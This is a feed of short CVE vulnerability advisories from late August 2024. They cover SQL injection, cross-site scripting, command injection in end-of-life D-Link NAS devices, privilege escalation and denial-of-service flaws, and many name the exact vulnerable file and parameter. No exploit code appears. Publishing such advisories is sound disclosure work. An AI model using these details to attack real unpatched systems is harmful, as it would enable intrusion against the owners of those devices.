🚨 CVE-2024-33224An issue in the component rtkio64.sys of Realtek Semiconductor Corp Realtek lO Driver v1.008.0823.2017 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-08-25 12:37:24 |
🚨 CVE-2024-8011Logitech Options+ on MacOS prior 1.72 allows a local attacker to inject dynamic library within Options+ runtime and abuse permissions granted by the user to Options+ such as Camera.🎖@cveNotify |
|
| 2024-08-25 09:37:24 |
🚨 CVE-2024-8147A vulnerability was found in code-projects Pharmacy Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /index.php?action=editPharmacist. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 08:37:25 |
🚨 CVE-2024-8146A vulnerability has been found in code-projects Pharmacy Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /index.php?action=editSalesman. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 08:37:24 |
🚨 CVE-2024-42340CyberArk - CWE-602: Client-Side Enforcement of Server-Side Security🎖@cveNotify |
|
| 2024-08-25 07:37:25 |
🚨 CVE-2024-42338CyberArk - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor🎖@cveNotify |
|
| 2024-08-25 07:37:24 |
🚨 CVE-2024-42337CyberArk - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor🎖@cveNotify |
|
| 2024-08-25 06:37:25 |
🚨 CVE-2024-8145A vulnerability, which was classified as problematic, has been found in ClassCMS 4.8. Affected by this issue is some unknown functionality of the file /index.php/admin of the component Article Handler. The manipulation of the argument Title leads to basic cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 06:37:24 |
🚨 CVE-2024-1430A vulnerability has been found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /currentsetting.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-25 04:37:24 |
🚨 CVE-2024-8144A vulnerability classified as problematic was found in ClassCMS 4.8. Affected by this vulnerability is an unknown functionality of the file /index.php/admin of the component Logo Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 03:37:24 |
🚨 CVE-2024-8142A vulnerability was found in SourceCodester Daily Calories Monitoring Tool 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /endpoint/delete-calorie.php. The manipulation of the argument calorie leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 02:37:25 |
🚨 CVE-2024-8141A vulnerability was found in SourceCodester Daily Calories Monitoring Tool 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/add-calorie.php. The manipulation of the argument calorie_date/calorie_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 02:37:24 |
🚨 CVE-2024-45244Hyperledger Fabric through 2.5.9 does not verify that a request has a timestamp within the expected time window.🎖@cveNotify |
|
| 2024-08-25 01:37:25 |
🚨 CVE-2024-8139A vulnerability has been found in itsourcecode E-Commerce Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file search_list.php. The manipulation of the argument user leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 01:37:24 |
🚨 CVE-2024-8138A vulnerability, which was classified as critical, was found in code-projects Pharmacy Management System 1.0. Affected is the function editManager of the file /index.php?action=editManager of the component Parameter Handler. The manipulation of the argument id as part of String leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available.🎖@cveNotify |
|
| 2024-08-24 23:37:32 |
🚨 CVE-2024-45239An issue was discovered in Fort before 1.6.3. A malicious RPKI repository that descends from a (trusted) Trust Anchor can serve (via rsync or RRDP) an ROA or a Manifest containing a null eContent field. Fort dereferences the pointer without sanitizing it first. Because Fort is an RPKI Relying Party, a crash can lead to Route Origin Validation unavailability, which can lead to compromised routing.🎖@cveNotify |
|
| 2024-08-24 23:37:25 |
🚨 CVE-2024-45236An issue was discovered in Fort before 1.6.3. A malicious RPKI repository that descends from a (trusted) Trust Anchor can serve (via rsync or RRDP) a signed object containing an empty signedAttributes field. Fort accesses the set's elements without sanitizing it first. Because Fort is an RPKI Relying Party, a crash can lead to Route Origin Validation unavailability, which can lead to compromised routing.🎖@cveNotify |
|
| 2024-08-24 23:37:24 |
🚨 CVE-2024-45234An issue was discovered in Fort before 1.6.3. A malicious RPKI repository that descends from a (trusted) Trust Anchor can serve (via rsync or RRDP) an ROA or a Manifest containing a signedAttrs encoded in non-canonical form. This bypasses Fort's BER decoder, reaching a point in the code that panics when faced with data not encoded in DER. Because Fort is an RPKI Relying Party, a panic can lead to Route Origin Validation unavailability, which can lead to compromised routing.🎖@cveNotify |
|
| 2024-08-24 22:37:25 |
🚨 CVE-2024-8136A vulnerability, which was classified as problematic, was found in SourceCodester Record Management System 1.0. This affects an unknown part of the file sort1_user.php. The manipulation of the argument position leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-24 22:37:24 |
🚨 CVE-2024-8135A vulnerability classified as critical has been found in Go-Tribe gotribe up to cd3ccd32cd77852c9ea73f986eaf8c301cfb6310. Affected is the function Sign of the file pkg/token/token.go. The manipulation of the argument config.key leads to hard-coded credentials. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as 4fb9b9e80a2beedd09d9fde4b9cf5bd510baf18f. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-08-24 20:37:24 |
🚨 CVE-2024-8134A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. It has been rated as critical. This issue affects the function cgi_FMT_Std2R5_1st_DiskMGR of the file /cgi-bin/hd_config.cgi of the component HTTP POST Request Handler. The manipulation of the argument f_source_dev leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-24 19:37:25 |
🚨 CVE-2024-8133A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. It has been declared as critical. This vulnerability affects the function cgi_FMT_R5_SpareDsk_DiskMGR of the file /cgi-bin/hd_config.cgi of the component HTTP POST Request Handler. The manipulation of the argument f_source_dev leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-24 18:37:25 |
🚨 CVE-2024-8132A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. It has been classified as critical. This affects the function webdav_mgr of the file /cgi-bin/webdav_mgr.cgi of the component HTTP POST Request Handler. The manipulation of the argument f_path leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-24 18:37:24 |
🚨 CVE-2024-8131A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814 and classified as critical. Affected by this issue is the function module_enable_disable of the file /cgi-bin/apkg_mgr.cgi of the component HTTP POST Request Handler. The manipulation of the argument f_module_name leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-24 17:37:24 |
🚨 CVE-2024-8130A vulnerability has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814 and classified as critical. Affected by this vulnerability is the function cgi_s3 of the file /cgi-bin/s3.cgi of the component HTTP POST Request Handler. The manipulation of the argument f_a_key leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-24 16:37:24 |
🚨 CVE-2024-8129A vulnerability, which was classified as critical, was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. Affected is the function cgi_s3_modify of the file /cgi-bin/s3.cgi of the component HTTP POST Request Handler. The manipulation of the argument f_job_name leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-24 12:37:25 |
🚨 CVE-2024-7656The Image Hotspot by DevVN plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.5 via deserialization of untrusted input in the 'devvn_ihotspot_shortcode_func' function. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-08-24 12:37:24 |
🚨 CVE-2022-43915IBM App Connect Enterprise Certified Container 5.0, 7.1, 7.2, 8.0, 8.1, 8.2, 9.0, 9.1, 9.2, 10.0, 10.1, 11.0, 11.1, 11.2, 11.3, 11.4, 11.5, 11.6, 12.0, and 12.1 does not limit calls to unshare in running Pods. This can allow a user with access to execute commands in a running Pod to elevate their user privileges.🎖@cveNotify |
|
| 2024-08-24 11:37:31 |
🚨 CVE-2024-41774IBM Common Licensing 9.0 is vulnerable to stored cross-site scripting. This vulnerability allows a privileged user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 350348.🎖@cveNotify |
|
| 2024-08-24 11:37:30 |
🚨 CVE-2023-35022IBM InfoSphere Information Server 11.7 could allow a local user to update projects that they do not have the authorization to access. IBM X-Force ID: 258254.🎖@cveNotify |
|
| 2024-08-24 11:37:27 |
🚨 CVE-2023-38368IBM Security Access Manager Docker 10.0.0.0 through 10.0.7.1 could disclose sensitive information to a local user to do improper permission controls. IBM X-Force ID: 261195.🎖@cveNotify |
|
| 2024-08-24 11:37:26 |
🚨 CVE-2023-30998IBM Security Access Manager Docker 10.0.0.0 through 10.0.7.1 could allow a local user to obtain root access due to improper access controls. IBM X-Force ID: 254649.🎖@cveNotify |
|
| 2024-08-24 11:37:25 |
🚨 CVE-2023-30430IBM Security Verify Access 10.0.0 through 10.0.7.1 could allow a local user to obtain sensitive information from trace logs. IBM X-Force ID: 252183.🎖@cveNotify |
|
| 2024-08-24 11:37:24 |
🚨 CVE-2024-22333IBM Maximo Asset Management 7.6.1.3 and IBM Maximo Application Suite 8.10 and 8.11 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 279973.🎖@cveNotify |
|
| 2024-08-24 10:37:24 |
🚨 CVE-2024-8127A vulnerability classified as critical was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. This vulnerability affects the function cgi_unzip of the file /cgi-bin/webfile_mgr.cgi of the component HTTP POST Request Handler. The manipulation of the argument path leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-24 08:37:24 |
🚨 CVE-2024-7351The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.3 via deserialization of untrusted input when editing job applications. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-08-24 04:37:24 |
🚨 CVE-2024-6499The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 9.7.8. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.🎖@cveNotify |
|
| 2024-08-24 03:37:25 |
🚨 CVE-2024-6631The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 3.1.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform unauthorized actions, such as updating plugin settings.🎖@cveNotify |
|
| 2024-08-24 03:37:24 |
🚨 CVE-2024-2254The RT Easy Builder – Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-24 02:37:25 |
🚨 CVE-2023-6987The String locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sql-column' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This required WP_DEBUG to be enabled in order to be exploited.🎖@cveNotify |
|
| 2024-08-24 02:37:24 |
🚨 CVE-2023-0926The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled.🎖@cveNotify |
|
| 2024-08-24 01:07:24 |
🚨 CVE-2024-39717The Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available for a user logged with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin. (Tenant level users do not have this privilege). The “Change Favicon” (Favorite Icon) option can be mis-used to upload a malicious file ending with .png extension to masquerade as image file. This is possible only after a user with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin has successfully authenticated and logged in. Severity: HIGH Exploitation Status:Versa Networks is aware of one confirmed customer reported instance where this vulnerability was exploited because the Firewall guidelines which were published in 2015 & 2017 were not implemented by that customer. This non-implementation resulted in the bad actor being able to exploit this vulnerability without using the GUI. In our testing (not exhaustive, as not all numerical versions of major browsers were tested) the malicious file does not get executed on the client. There are reports of others based on backbone telemetry observations of a 3rd party provider, however these are unconfirmed to date.🎖@cveNotify |
|
| 2024-08-23 23:37:24 |
🚨 CVE-2024-38207Microsoft Edge (HTML-based) Memory Corruption Vulnerability🎖@cveNotify |
|
| 2024-08-23 21:37:25 |
🚨 CVE-2024-2821A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7. Affected by this issue is some unknown functionality of the file /src/dede/friendlink_edit.php. The manipulation of the argument id leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-23 21:37:24 |
🚨 CVE-2024-2056Services that are running and bound to the loopback interface on the Artica Proxy are accessible through the proxy service. In particular, the "tailon" service is running, running as the root user, is bound to the loopback interface, and is listening on TCP port 7050. Security issues associated with exposing this network service are documented at gvalkov's 'tailon' GitHub repo. Using the tailon service, the contents of any file on the Artica Proxy can be viewed.🎖@cveNotify |
|
| 2024-08-23 20:37:25 |
🚨 CVE-2024-24139Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter.🎖@cveNotify |
|
| 2024-08-23 20:37:24 |
🚨 CVE-2024-23741An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.🎖@cveNotify |
|
| 2024-08-23 20:07:25 |
🚨 CVE-2024-7934A vulnerability was found in itsourcecode Project Expense Monitoring System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file execute.php. The manipulation of the argument code leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-23 20:07:24 |
🚨 CVE-2024-7933A vulnerability was found in itsourcecode Project Expense Monitoring System 1.0. It has been classified as critical. Affected is an unknown function of the file login1.php of the component Backend Login. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-23 19:37:38 |
🚨 CVE-2024-42992Python Pip Pandas v2.2.2 was discovered to contain an arbitrary file read vulnerability.🎖@cveNotify |
|
| 2024-08-23 19:37:31 |
🚨 CVE-2024-44386Tenda FH1206 V1.2.0.8(8155)_EN contains a Buffer Overflow vulnerability via the function fromSetIpBind.🎖@cveNotify |
|
| 2024-08-23 19:37:30 |
🚨 CVE-2024-31882IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service, under specific configurations, as the server may crash when using a specially crafted SQL statement by an authenticated user. IBM X-Force ID: 287614.🎖@cveNotify |
|
| 2024-08-23 19:37:29 |
🚨 CVE-2023-50314IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.8 could allow an attacker with access to the network to conduct spoofing attacks. An attacker could exploit this vulnerability using a certificate issued by a trusted authority to obtain sensitive information. IBM X-Force ID: 274713.🎖@cveNotify |
|
| 2024-08-23 19:37:26 |
🚨 CVE-2024-24194robdns commit d76d2e6 was discovered to contain a NULL pointer dereference via the item->tokens component at /src/conf-parse.c.🎖@cveNotify |
|
| 2024-08-23 19:37:25 |
🚨 CVE-2024-20032In aee, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08487630; Issue ID: MSV-1020.🎖@cveNotify |
|
| 2024-08-23 19:37:24 |
🚨 CVE-2023-27151openCRX 5.2.0 was discovered to contain an HTML injection vulnerability for Search Criteria-Activity Number (in the Saved Search Activity) via the Name, Description, or Activity Number field.🎖@cveNotify |
|
| 2024-08-23 18:37:26 |
🚨 CVE-2024-39338axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.🎖@cveNotify |
|
| 2024-08-23 18:37:25 |
🚨 CVE-2024-20451Multiple vulnerabilities in the web-based management interface of Cisco Small Business SPA300 Series IP Phones and Cisco Small Business SPA500 Series IP Phones could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly.These vulnerabilities exist because HTTP packets are not properly checked for errors. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the remote interface of an affected device. A successful exploit could allow the attacker to cause a DoS condition on the device.🎖@cveNotify |
|
| 2024-08-23 18:37:24 |
🚨 CVE-2024-20450Multiple vulnerabilities in the web-based management interface of Cisco Small Business SPA300 Series IP Phones and Cisco Small Business SPA500 Series IP Phones could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system with root privileges.These vulnerabilities exist because incoming HTTP packets are not properly checked for errors, which could result in a buffer overflow. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to overflow an internal buffer and execute arbitrary commands at the root privilege level.🎖@cveNotify |
|
| 2024-08-23 17:37:42 |
🚨 CVE-2024-41848Adobe Experience Manager versions 6.5.20 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2024-08-23 17:37:41 |
🚨 CVE-2024-41845Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-08-23 17:37:40 |
🚨 CVE-2024-41844Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-08-23 17:37:37 |
🚨 CVE-2024-41843Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-08-23 17:37:36 |
🚨 CVE-2024-39841A SQL Injection vulnerability exists in the service configuration functionality in Centreon Web 24.04.x before 24.04.3, 23.10.x before 23.10.13, 23.04.x before 23.04.19, and 22.10.x before 22.10.23.🎖@cveNotify |
|
| 2024-08-23 17:37:35 |
🚨 CVE-2024-33854A SQL Injection vulnerability exists in the Graph Template component in Centreon Web 24.04.x before 24.04.3, 23.10.x before 23.10.13, 23.04.x before 23.04.19, and 22.10.x before 22.10.23.🎖@cveNotify |
|
| 2024-08-23 17:37:31 |
🚨 CVE-2024-32501A SQL Injection vulnerability exists in the updateServiceHost functionality in Centreon Web 24.04.x before 24.04.3, 23.10.x before 23.10.13, 23.04.x before 23.04.19, and 22.10.x before 22.10.23.🎖@cveNotify |
|
| 2024-08-23 17:37:30 |
🚨 CVE-2024-43031autMan v2.9.6 was discovered to contain an access control issue.🎖@cveNotify |
|
| 2024-08-23 17:37:26 |
🚨 CVE-2024-39717The Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available for a user logged with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin. (Tenant level users do not have this privilege). The “Change Favicon” (Favorite Icon) option can be mis-used to upload a malicious file ending with .png extension to masquerade as image file. This is possible only after a user with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin has successfully authenticated and logged in. Severity: HIGH Exploitation Status:Versa Networks is aware of one confirmed customer reported instance where this vulnerability was exploited because the Firewall guidelines which were published in 2015 & 2017 were not implemented by that customer. This non-implementation resulted in the bad actor being able to exploit this vulnerability without using the GUI. In our testing (not exhaustive, as not all numerical versions of major browsers were tested) the malicious file does not get executed on the client. There are reports of others based on backbone telemetry observations of a 3rd party provider, however these are unconfirmed to date.🎖@cveNotify |
|
| 2024-08-23 17:37:25 |
🚨 CVE-2024-41675CKAN is an open-source data management system for powering data hubs and data portals. The Datatables view plugin did not properly escape record data coming from the DataStore, leading to a potential XSS vector. Sites running CKAN >= 2.7.0 with the datatables_view plugin activated. This is a plugin included in CKAN core, that not activated by default but it is widely used to preview tabular data. This vulnerability has been fixed in CKAN 2.10.5 and 2.11.0.🎖@cveNotify |
|
| 2024-08-23 17:37:24 |
🚨 CVE-2023-43847Incorrect access control in the outlet control function of web interface in Aten PE6208 2.3.228 and 2.4.232 allows remote authenticated users to control all the outlets as if they were the administrator via HTTP POST requests.🎖@cveNotify |
|
| 2024-08-23 17:07:43 |
🚨 CVE-2024-7885A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.🎖@cveNotify |
|
| 2024-08-23 17:07:42 |
🚨 CVE-2020-11846A vulnerability found in OpenText Privileged Access Manager that issues a token. on successful issuance of the token, a cookie gets set that allows unrestricted access to all the application resources. This issue affects Privileged Access Manager before 3.7.0.1.🎖@cveNotify |
|
| 2024-08-23 17:07:41 |
🚨 CVE-2024-37008A maliciously crafted DWG file, when parsed in Revit, can force a stack-based buffer overflow. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-08-23 17:07:37 |
🚨 CVE-2024-3114An issue was discovered in GitLab CE/EE affecting all versions starting from 11.10 prior to 17.0.6, 17.1 prior to 17.1.4, and 17.2 prior to 17.2.2, with the processing logic for parsing invalid commits can lead to a regular expression DoS attack on the server.🎖@cveNotify |
|
| 2024-08-23 17:07:36 |
🚨 CVE-2024-6329An issue was discovered in GitLab CE/EE affecting all versions starting from 8.16 prior to 17.0.6, starting from 17.1 prior to 17.1.4, and starting from 17.2 prior to 17.2.2, which causes the web interface to fail to render the diff correctly when the path is encoded.🎖@cveNotify |
|
| 2024-08-23 17:07:32 |
🚨 CVE-2024-4210A Denial of Service (DoS) condition has been discovered in GitLab CE/EE affecting all versions starting with 12.6 before 17.0.6, 17.1 prior to 17.1.4, and 17.2 prior to 17.2.2. It is possible for an attacker to cause a denial of service using crafted adoc files.🎖@cveNotify |
|
| 2024-08-23 17:07:31 |
🚨 CVE-2024-7339A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273262 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-23 17:07:30 |
🚨 CVE-2024-40883Cross-site request forgery vulnerability exists in ELECOM wireless LAN routers. Viewing a malicious page while logging in to the affected product with an administrative privilege, the user may be directed to perform unintended operations such as changing the login ID, login password, etc.🎖@cveNotify |
|
| 2024-08-23 17:07:27 |
🚨 CVE-2024-7327A vulnerability classified as critical was found in Xinhu RockOA 2.6.2. This vulnerability affects the function dataAction of the file /webmain/task/openapi/openmodhetongAction.php. The manipulation of the argument nickName leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273250 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-23 17:07:26 |
🚨 CVE-2024-6471A vulnerability classified as critical has been found in SourceCodester Online Tours & Travels Management 1.0. This affects an unknown part of the file sms_setting.php. The manipulation of the argument uname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270279.🎖@cveNotify |
|
| 2024-08-23 17:07:25 |
🚨 CVE-2024-6114A vulnerability classified as critical has been found in itsourcecode Monbela Tourist Inn Online Reservation System up to 1.0. Affected is an unknown function of the file controller.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268866 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-23 16:07:24 |
🚨 CVE-2020-11843This allows the information exposure to unauthorized users. This issue affects NetIQ Access Manager using version 4.5 or before🎖@cveNotify |
|
| 2024-08-23 15:37:44 |
🚨 CVE-2024-42564ERP commit 44bd04 was discovered to contain a SQL injection vulnerability via the id parameter at /index.php/basedata/inventory/delete?action=delete.🎖@cveNotify |
|
| 2024-08-23 15:37:43 |
🚨 CVE-2024-40487A Stored Cross Site Scripting (XSS) vulnerability was found in "/view_type.php" of Kashipara Live Membership System v1.0, which allows remote attackers to execute arbitrary code via membershipType parameter.🎖@cveNotify |
|
| 2024-08-23 15:37:42 |
